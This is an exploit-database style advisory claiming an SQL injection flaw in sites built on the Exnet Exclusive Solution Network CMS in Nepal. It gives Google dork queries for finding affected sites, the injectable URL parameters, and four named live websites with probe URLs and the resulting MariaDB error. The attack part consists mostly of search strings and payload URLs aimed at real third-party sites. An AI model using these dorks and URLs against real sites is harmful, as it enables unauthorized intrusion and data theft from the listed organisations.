#################################################################################################
# Exploit Title : Powered By Exnet Exclusive Solution Network Nepal SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 12/09/2018
# Vendor Homepage : exnet.com.np
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Google Dork :
intext:''Powered by: Exclusive Solution Network''
intext:''Powered by Exnet Exclusive Solution Network'' site:np
# Exploit :
/s.php?exsn=[SQL Injection]
/sm_detail.php?exsubsn=[SQL Injection]
/s.php?exsn=[ID-NUMBER]&exmenusn=[ID-NUMBER]&exsubsn=[SQL Injection]
#################################################################################################
# Example Sites =>
nmt.edu.np/s.php?exsn=11%27
woscc.org.np/s.php?exsn=20&exmenusn=13&exsubsn=17%27
hicodef.org.np/s.php?exsn=19&exmenusn=1&exsubsn=14%27
hotelprakash.com.np/s.php?exsn=8&exmenusn=3&exsubsn=1%27
# SQL Database Error =>
You have an error in your SQL syntax; check the manual that corresponds to your
MariaDB server version for the right syntax to use near 'order by exmenusn' at line 1
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################